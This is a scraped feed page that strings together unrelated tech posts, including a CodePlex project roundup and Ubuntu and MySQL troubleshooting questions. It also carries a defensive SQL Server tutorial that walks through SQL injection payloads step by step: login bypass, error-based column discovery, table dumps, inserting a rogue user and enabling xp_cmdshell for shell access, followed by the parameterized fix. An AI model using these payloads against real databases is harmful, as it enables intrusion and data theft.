deploy must have been run at least once before hand on your brand new Mac (to be clear that's once ever, not once every restart). On doing so you will be presented with a license agreement from Apple that you must accept. Only once you've done this will the command line calls work.  They're currently failing as you haven't accepted the legal terms and conditions. (arguably you an also accept the terms and conditions from the command line too, but ADF Mobile cannot do this on your behalf, so it's just easier to open the tools and confirm the legal requirements that way). Putting aside the error code and its meaning, watching the log window, watching what commands are executed, learning what they do, this will assist you to diagnose issues yourself and solve these sort of issues more relatively quickly.  From my perspective as an Oracle Product Manager, it allows me to say "this is the stuff you don't need to worry about when you use ADF Mobile when it's configured correctly" .... as you can see my salesman qualities shine through. For anyone who is happily using ADF Mobile on a Mac and wondering why you didn't hit these issues, it's quite likely that you already accepted the license conditions before deploying via ADF Mobile.  For instance, though I'm not a fan of iTunes itself, iTunes was one of the first things I loaded on my Mac to access my Justin Bieber albums. Image courtesy of winnond / FreeDigitalPhotos.net

    Read the article

  • CodePlex Daily Summary for Thursday, June 03, 2010

    CodePlex Daily Summary for Thursday, June 03, 2010New ProjectsAlbatross: Albatross framework. We are still working on the documentation, more details will be available soon.ApiChange: ApiChange is the Swiss army knife for inspecting your assemblies from the command line. Now you can do basic operations like diff, who uses (method...BaseCalendar: BaseCalendar is a server-side ASP.NET web control (WebForms or MVC) that renders a calendar while giving you full control over the generated HTML. ...CESAVE: Proyectos para el Comité Estatal de Sanidad Vegetal.Closure Compiler w/ Annotations Visual Studio 2010 Snippets: This is an attempt to create reusable Visual Studio snippets to make working with closure compiler annotated JavaScript more productive. VS2010 ...Common Service Host: Common Service Host is a generic Windows Communication Service Host and factory that uses the Common Service Locator to create Service objects. ...DarkLight: DarkLight is a 2D Lighting Engine written in XNA, and allows developers to create 2D shadowing effects in their 2D games easily. It supports poi...Earn Burn Tracker: A tool to track earned value against a given release, initiative, feature set, and objects.eOfficeAACS: eOffice is an open source access control and attendance management system developed by e-bird Innovation (www.ebirdinfo.com).Its flexible design al...FLV Video conversion library for .Net 3.5: This is a component created to call the ffmpeg tool to convert various video formats to the Adobe Flash FLV output format. The component also takes...Google Moderator: .NET client library for the Google Moderator API.linq to jquery: provides support for linq to jquery objectsMobile Vikings Data: App to view your data usage RefBrowser: RefBrowserRESX Translator with Bing (from Microsoft Consulting Services, UK): A Windows Form application that automatically translates RESX files using Bing web servicesRhyduino - Remote Arduino Control via Managed Code: Rhyduino makes it easy for Visual Studio / Windows devs to control the Arduino using a computer. It's like supercharging your Arduino with all the ...SharePoint 2010 CSV Bulk Term Set Importer: Allows for multiple import of *.csv files to a given term group in SharePoint 2010 Term Store. It will create new term group based on the name pr...SharePoint Feature - Export history version to Excel: Add a function to list the action button, the ability to export history version of the item sheet to Excel from the specified date. Features suppo...SwEntry: A system that allows people to open doors by using a Bluetooth enabled phone. Things to Do with the DLR: This project is about ideas and sample code around the Dynamic Language Runtime.Work Recorder - Hold on own time!: Work Recorder is a office aid software which can recorde the time used on PC for researchers, office workers and students. And it is also a good he...xuezhixu: xuezhixu foundYaget: Yet Another Game Engine TechnologyNew ReleasesBackUpAnyWhere: backupanywhere RC1: this is the RC of our programBaseCalendar: BaseControls 1.0: BaseControls 1.0 contains the BaseCalendar ASP.NET control.BizTalk Server Pipeline Component Wizard: 2.20: Version suitable for 2010 release.CheckHeader: CheckHeader v0.8.6: The Microsoft .NET Framework 4.0 is needed to run this program.Chirpy - VS Add In For Handling Js, Css, and DotLess Files: Chirpy Installer for VS 2010 (Ver-1.0.0.2): VS 2010 Installer for the Chirpy AddIn. Version 1.0.0.2Christoc's DotNetNuke C# Module Development Template: 00.00.01: This is the initial release of Christoc's DotNetNuke C# Module Development Template. You can use the Template as-is, or you can customize the VSTem...Closure Compiler w/ Annotations Visual Studio 2010 Snippets: v1 release: The initial release of the projectCommunity Forums NNTP bridge: Community Forums NNTP Bridge V22: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...Community Forums NNTP bridge: Community Forums NNTP Bridge V23: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...Community Forums NNTP bridge: Community Forums NNTP Bridge V24: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...DarkLight: DarkLight Engine v1.0: This is the first version of the DarkLight engine and currently supports point, spot and area lights with no upper limit on the number of lights. ...DotNetNuke® Skin Collaborate: Collaborate Package 1.1.0: Newer version of Collaborate included fixes: - removed conditional code to display control panel - changed background color to match with backgroun...dotSpatial: System.Spatial.Projection Zip June 2, 2010: This version tries to fix a problem with reprojecting to UTM zones. It is still being tested though.Entity Framework Repository & Unit of Work Template: 1.0.1: This version has more than just the T4 template. I have added a new template that has a RepositoryHelper class for use with StructureMap. Also th...FLV Video conversion library for .Net 3.5: Beta 1: This is the first release of this project. Improvements may be added if necessary.HERB.IQ: Alpha 0.1 Preview: Only clone tab works, just setting up the GUI and getting the XML data handling working correctlyJetfire - Workflow DSL: V1.2.0: The complete source code required for a Jetfire system (server and client nexus) is included in the release. Highlights of Changes Full programmat...linq to jquery: linq to jquery alpha: beta development projectMapWindow6: MapWindow 6.0 June 2, 2010: This version fixes a problem with projecting to UTM zones. I'm not sure that this works perfectly yet. It seemed to require a zone adjustment by ...patterns & practices Web Client Developer Guidance: Developing Web Apps May 2010 Beta: This RelesaeThis drop includes updated documentation, links, and graphics. We are still looking for feedback on this release. Plans going forward...patterns & practices: Composite WPF and Silverlight: Prism 4.0 Drop 1: Prism 4.0 Drop 1 Welcome to the first drop of Prism 4.0 (formally known as the Composite Application Guidance for WPF and Silverlight). This drop i...Powershell4SQL: Version 1.3: Changes from version 1.2 Added support for -Confirm and -WhatIf parameters Added support for -Verbose mode. Includes SQL Batch text, parameters ...RESX Translator with Bing (from Microsoft Consulting Services, UK): v1.0: This is the initial release of the toolRhyduino - Remote Arduino Control via Managed Code: Beta Release (v0.80): LibraryAuto-detects connected Arduino devices. Uses system resources intelligently to take advantage of multiple CPU cores when present. Firmata ...SharePoint Feature - Export history version to Excel: Export Item List Version: - multilanguage support Czech, English Install: "C:\Program Files\Common Files\Microsoft Shared\web server extensions\12\BIN\stsadm.exe" -o addsol...Simulo: Simulo v2.5: That's the third release of Simulo (v2.5). For detailed info on what's new, read the changes log block at the project's home page. System requirem...Site Directory for SharePoint 2010 (from Microsoft Consulting Services, UK): v1.5: Please carefully follow the Installation Guideas there are additional actions that need to be undertaken in this release. As 1.4 with the followin...Spackle.NET: 4.1.0.0 Release: Added IEquatable<T> to Range<T>StreamInsight Samples: Microsoft StreamInsight Product Team Samples: This is the current snapshot of the samples created by the Streaminsight Product Team.Touch Mice: 0.1: Initial release of Touch MiceVCC: Latest build, v2.1.30602.0: Automatic drop of latest buildVivoSocial: VivoSocial 7.2.0: Version 7.2.0 of VivoSocial has been released. If you experienced any issues with the previous version, please update your modules to the 7.2.0 rel...Work Recorder - Hold on own time!: WorkRecorder 1.0: +Finished Version 1.0Most Popular ProjectsCommunity Forums NNTP bridgeOutSyncASP.NET MVC Time PlannerNeatUploadMoonyDesk (windows desktop widgets)Mute4eXpress Persistent Objects (XPO) ToolkitAgUnit - Silverlight unit testing with ReSharperASP.NET MVC ExtensionsAviva Solutions C# Coding GuidelinesMost Active ProjectsCommunity Forums NNTP bridgeGMap.NET - Great Maps for Windows Forms & PresentationRawrIonics Isapi Rewrite FilterN2 CMSpatterns & practices – Enterprise LibraryBlogEngine.NETGameSetFarseer Physics EngineMirror Testing System

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • ubuntu 12.04 python problem or?

    - by Trki
    Hi i am trying to fix this for a long time but without success. When i open my zsh terminal i get this error: (terminal is working but error appear) Welcome to the world of tomorrow! virtualenvwrapper_run_hook:12: permission denied: virtualenvwrapper.sh: There was a problem running the initialization hooks. If Python could not import the module virtualenvwrapper.hook_loader, check that virtualenv has been installed for VIRTUALENVWRAPPER_PYTHON= and that PATH is set properly. I tried few things but... dont know how to solve it. Somehow during looking for a search i found i should post here an output of: ? sudo dpkg --configure -a Setting up python-pip (1.0-1build1) ... /var/lib/dpkg/info/python-pip.postinst: 6: /var/lib/dpkg/info/python-pip.postinst: pycompile: not found dpkg: error processing python-pip (--configure): subprocess installed post-installation script returned error exit status 127 Setting up libc-dev-bin (2.15-0ubuntu10.5) ... Setting up gnome-control-center-data (1:3.4.2-0ubuntu0.13) ... Setting up linux-libc-dev (3.2.0-56.86) ... Setting up python-virtualenv (1.7.1.2-1) ... /var/lib/dpkg/info/python-virtualenv.postinst: 6: /var/lib/dpkg/info/python-virtualenv.postinst: pycompile: not found dpkg: error processing python-virtualenv (--configure): subprocess installed post-installation script returned error exit status 127 Setting up libglib2.0-0 (2.32.4-0ubuntu1) ... Setting up libglib2.0-0:i386 (2.32.4-0ubuntu1) ... Setting up gimp (2.6.12-1ubuntu1.2) ... /var/lib/dpkg/info/gimp.postinst: 11: /var/lib/dpkg/info/gimp.postinst: pycompile: not found dpkg: error processing gimp (--configure): subprocess installed post-installation script returned error exit status 127 Setting up libpolkit-gobject-1-0 (0.104-1ubuntu1.1) ... Setting up libgnome-control-center1 (1:3.4.2-0ubuntu0.13) ... Setting up libnm-util2 (0.9.4.0-0ubuntu4.3) ... Setting up libc6-dev (2.15-0ubuntu10.5) ... Setting up libpulse-mainloop-glib0 (1:1.1-0ubuntu15.4) ... dpkg: dependency problems prevent configuration of virtualenvwrapper: virtualenvwrapper depends on python-virtualenv; however: Package python-virtualenv is not configured yet. dpkg: error processing virtualenvwrapper (--configure): dependency problems - leaving unconfigured Setting up libpolkit-agent-1-0 (0.104-1ubuntu1.1) ... Setting up libupower-glib1 (0.9.15-3git1ubuntu0.1) ... Setting up libaccountsservice0 (0.6.15-2ubuntu9.6.1) ... Setting up libpolkit-backend-1-0 (0.104-1ubuntu1.1) ... Setting up libglib2.0-bin (2.32.4-0ubuntu1) ... Setting up libnm-glib4 (0.9.4.0-0ubuntu4.3) ... Setting up policykit-1 (0.104-1ubuntu1.1) ... Setting up gnome-settings-daemon (3.4.2-0ubuntu0.6.4) ... Setting up accountsservice (0.6.15-2ubuntu9.6.1) ... dpkg: error processing ubuntu-system-service (--configure): Package is in a very bad inconsistent state - you should reinstall it before attempting configuration. Processing triggers for libc-bin ... ldconfig deferred processing now taking place Errors were encountered while processing: python-pip python-virtualenv gimp virtualenvwrapper ubuntu-system-service Also: ? python --version zsh: command not found: python Part of my ~/.zshrc # python virtual env wrapper if [ -f ~/.local/bin/virtualenvwrapper.sh ]; then export WORKON_HOME=~/.virtualenvs source ~/.local/bin/virtualenvwrapper.sh plugins=("${plugins[@]}" virtualenvwrapper) fi # pythonbrew [[ -s ~/.pythonbrew/etc/bashrc ]] && source ~/.pythonbrew/etc/bashrc Part os zsh -xv # # Invoke the initialization functions # virtualenvwrapper_initialize +/home/trki/.local/bin/virtualenvwrapper.sh:1179> virtualenvwrapper_initialize +virtualenvwrapper_initialize:1> virtualenvwrapper_derive_workon_home +virtualenvwrapper_derive_workon_home:1> typeset 'workon_home_dir=/home/trki/.virtualenvs' +virtualenvwrapper_derive_workon_home:5> [ /home/trki/.virtualenvs '=' '' ']' +virtualenvwrapper_derive_workon_home:12> echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:12> unset GREP_OPTIONS +virtualenvwrapper_derive_workon_home:12> grep '^[^/~]' +virtualenvwrapper_derive_workon_home:21> echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:21> unset GREP_OPTIONS +virtualenvwrapper_derive_workon_home:21> egrep '([\$~]|//)' +virtualenvwrapper_derive_workon_home:30> echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:31> return 0 +virtualenvwrapper_initialize:1> export 'WORKON_HOME=/home/trki/.virtualenvs' +virtualenvwrapper_initialize:3> virtualenvwrapper_verify_workon_home -q +virtualenvwrapper_verify_workon_home:1> RC=0 +virtualenvwrapper_verify_workon_home:2> [ ! -d /home/trki/.virtualenvs/ ']' +virtualenvwrapper_verify_workon_home:11> return 0 +virtualenvwrapper_initialize:6> [ /home/trki/.virtualenvs '=' '' ']' +virtualenvwrapper_initialize:11> virtualenvwrapper_run_hook initialize +virtualenvwrapper_run_hook:1> typeset hook_script +virtualenvwrapper_run_hook:2> typeset result +virtualenvwrapper_run_hook:4> hook_script=+virtualenvwrapper_run_hook:4> virtualenvwrapper_tempfile initialize-hook +virtualenvwrapper_tempfile:2> typeset 'suffix=initialize-hook' +virtualenvwrapper_tempfile:3> typeset file +virtualenvwrapper_tempfile:5> file=+virtualenvwrapper_tempfile:5> virtualenvwrapper_mktemp -t virtualenvwrapper-initialize-hook-XXXXXXXXXX +virtualenvwrapper_mktemp:1> mktemp -t virtualenvwrapper-initialize-hook-XXXXXXXXXX +virtualenvwrapper_tempfile:5> file=/tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_tempfile:6> [ 0 -ne 0 ']' +virtualenvwrapper_tempfile:6> [ -z /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 ']' +virtualenvwrapper_tempfile:6> [ ! -f /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 ']' +virtualenvwrapper_tempfile:11> echo /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_tempfile:12> return 0 +virtualenvwrapper_run_hook:4> hook_script=/tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_run_hook:11> cd /home/trki/.virtualenvs +cd:1> [[ x/home/trki/.virtualenvs == x... ]] +cd:3> [[ x/home/trki/.virtualenvs == x.... ]] +cd:5> [[ x/home/trki/.virtualenvs == x..... ]] +cd:7> [[ x/home/trki/.virtualenvs == x...... ]] +cd:9> [ -d /home/trki/.autoenv ']' +cd:13> cd /home/trki/.virtualenvs +virtualenvwrapper_run_hook:12> '' -m virtualenvwrapper.hook_loader --script /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 initialize virtualenvwrapper_run_hook:12: permission denied: +virtualenvwrapper_run_hook:15> result=126 +virtualenvwrapper_run_hook:17> [ 126 -eq 0 ']' +virtualenvwrapper_run_hook:27> [ initialize '=' initialize ']' +virtualenvwrapper_run_hook:29> cat - virtualenvwrapper.sh: There was a problem running the initialization hooks. If Python could not import the module virtualenvwrapper.hook_loader, check that virtualenv has been installed for VIRTUALENVWRAPPER_PYTHON= and that PATH is set properly. +virtualenvwrapper_run_hook:38> rm -f /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_run_hook:39> return 126 +virtualenvwrapper_initialize:13> virtualenvwrapper_setup_tab_completion +virtualenvwrapper_setup_tab_completion:1> [ -n '' ']' +virtualenvwrapper_setup_tab_completion:20> [ -n 4.3.17 ']' +virtualenvwrapper_setup_tab_completion:30> compctl -K _virtualenvs workon rmvirtualenv cpvirtualenv showvirtualenv +virtualenvwrapper_setup_tab_completion:31> compctl -K _cdvirtualenv_complete cdvirtualenv +virtualenvwrapper_setup_tab_completion:32> compctl -K _cdsitepackages_complete cdsitepackages +virtualenvwrapper_initialize:15> return 0 +/home/trki/.zshrc:17> plugins=( git python django symfony2 zsh-syntax-highlighting composer history-substring-search virtualenvwrapper ) # pythonbrew [[ -s ~/.pythonbrew/etc/bashrc ]] && source ~/.pythonbrew/etc/bashrc +/home/trki/.zshrc:21> [[ -s /home/trki/.pythonbrew/etc/bashrc ]] Also when i try to open ubuntu software center absolutly nothing happens. No idea what to do now.

    Read the article

  • Mysql performance problem & Failed DIMM

    - by murdoch
    Hi I have a dedicated mysql database server which has been having some performance problems recently, under normal load the server will be running fine, then suddenly out of the blue the performance will fall off a cliff. The server isn't using the swap file and there is 12GB of RAM in the server, more than enough for its needs. After contacting my hosting comapnies support they have discovered that there is a failed 2GB DIMM in the server and have scheduled to replace it tomorow morning. My question is could a failed DIMM result in the performance problems I am seeing or is this just coincidence? My worry is that they will replace the ram tomorrow but the problems will persist and I will still be lost of explanations so I am just trying to think ahead. The reason I ask is that there is plenty of RAM in the server, more than required and simply missing 2GB should be a problem, so if this failed DIMM is causing these performance problems then the OS must be trying to access the failed DIMM and slowing down as a result. Does that sound like a credible explanation? This is what DELLs omreport program says about the RAM, notice one dimm is "Critical" Memory Information Health : Critical Memory Operating Mode Fail Over State : Inactive Memory Operating Mode Configuration : Optimizer Attributes of Memory Array(s) Attributes : Location Memory Array 1 : System Board or Motherboard Attributes : Use Memory Array 1 : System Memory Attributes : Installed Capacity Memory Array 1 : 12288 MB Attributes : Maximum Capacity Memory Array 1 : 196608 MB Attributes : Slots Available Memory Array 1 : 18 Attributes : Slots Used Memory Array 1 : 6 Attributes : ECC Type Memory Array 1 : Multibit ECC Total of Memory Array(s) Attributes : Total Installed Capacity Value : 12288 MB Attributes : Total Installed Capacity Available to the OS Value : 12004 MB Attributes : Total Maximum Capacity Value : 196608 MB Details of Memory Array 1 Index : 0 Status : Ok Connector Name : DIMM_A1 Type : DDR3-Registered Size : 2048 MB Index : 1 Status : Ok Connector Name : DIMM_A2 Type : DDR3-Registered Size : 2048 MB Index : 2 Status : Ok Connector Name : DIMM_A3 Type : DDR3-Registered Size : 2048 MB Index : 3 Status : Critical Connector Name : DIMM_B1 Type : DDR3-Registered Size : 2048 MB Index : 4 Status : Ok Connector Name : DIMM_B2 Type : DDR3-Registered Size : 2048 MB Index : 5 Status : Ok Connector Name : DIMM_B3 Type : DDR3-Registered Size : 2048 MB the command free -m shows this, the server seems to be using more than 10GB of ram which would suggest it is trying to use the DIMM total used free shared buffers cached Mem: 12004 10766 1238 0 384 4809 -/+ buffers/cache: 5572 6432 Swap: 2047 0 2047 iostat output while problem is occuring avg-cpu: %user %nice %system %iowait %steal %idle 52.82 0.00 11.01 0.00 0.00 36.17 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 47.00 0.00 576.00 0 576 sda1 0.00 0.00 0.00 0 0 sda2 1.00 0.00 32.00 0 32 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 46.00 0.00 544.00 0 544 avg-cpu: %user %nice %system %iowait %steal %idle 53.12 0.00 7.81 0.00 0.00 39.06 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 49.00 0.00 592.00 0 592 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 49.00 0.00 592.00 0 592 avg-cpu: %user %nice %system %iowait %steal %idle 56.09 0.00 7.43 0.37 0.00 36.10 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 232.00 0.00 64520.00 0 64520 sda1 0.00 0.00 0.00 0 0 sda2 159.00 0.00 63728.00 0 63728 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 73.00 0.00 792.00 0 792 avg-cpu: %user %nice %system %iowait %steal %idle 52.18 0.00 9.24 0.06 0.00 38.51 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 49.00 0.00 600.00 0 600 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 49.00 0.00 600.00 0 600 avg-cpu: %user %nice %system %iowait %steal %idle 54.82 0.00 8.64 0.00 0.00 36.55 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 100.00 0.00 2168.00 0 2168 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 100.00 0.00 2168.00 0 2168 avg-cpu: %user %nice %system %iowait %steal %idle 54.78 0.00 6.75 0.00 0.00 38.48 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 84.00 0.00 896.00 0 896 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 84.00 0.00 896.00 0 896 avg-cpu: %user %nice %system %iowait %steal %idle 54.34 0.00 7.31 0.00 0.00 38.35 Device: tps Blk_read/s 